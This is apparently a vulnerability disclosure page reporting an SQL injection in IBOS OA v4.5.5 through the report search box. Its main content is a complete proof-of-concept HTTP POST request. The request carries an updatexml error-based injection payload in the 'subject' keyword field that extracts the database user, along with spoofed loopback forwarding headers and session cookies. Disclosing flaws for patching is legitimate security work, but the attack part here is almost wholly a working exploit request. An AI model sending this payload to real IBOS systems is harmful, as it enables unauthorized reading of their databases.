代码拉取完成,页面将自动刷新
ibos oa v4.5.5 sql Injection vulnerability
download link:https://gitee.com/ibos/IBOS
Function point: Report => Search box
.png)
.png)
POC
POST /?r=report/api/getlist HTTP/1.1
Host: www.ibos.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 124
Origin: http://www.ibos.com
Connection: close
Referer: http://www.ibos.com/?r=report/default/index
Cookie: 4tVy_saltkey=JPW119wg; PHPSESSID=0pbgbc7oflgcqf792p92nqo7u0; 4tVy_sid=0r6tzo; lastautologin=0; 4tVy_lastactivity=1679978644; 4tVy_ulastactivity=d9bdiYlHnIPm8Tx0Dnc%2BPNmlkEXAIfB%2BmyV9r5ENIIsFGRSnQdPC; 4tVy_creditremind=0D0D2D0D0D0D1; 4tVy_creditbase=0D4D47D5D0D0; 4tVy_creditrule=%E6%AF%8F%E5%A4%A9%E7%99%BB%E5%BD%95; 4tVy_dropnotify=%7B%22assignment%22%3A%221%22%2C%22email%22%3A%221%22%2C%22officialdoc%22%3A%223%22%2C%22user%22%3A%222%22%2C%22vote%22%3A%222%22%2C%22unread_notify%22%3A9%2C%22unread_atme%22%3A0%2C%22unread_comment%22%3A0%2C%22unread_message%22%3A1%2C%22new_folower_count%22%3A0%2C%22unread_total%22%3A10%7D
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
{"limit":10,"offset":0,"type":"send","keyword":{"subject":"') AND (updatexml(1,concat(0x7e,(select user()),0x7e),1))-- qw"}}
Error to get the database name

此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。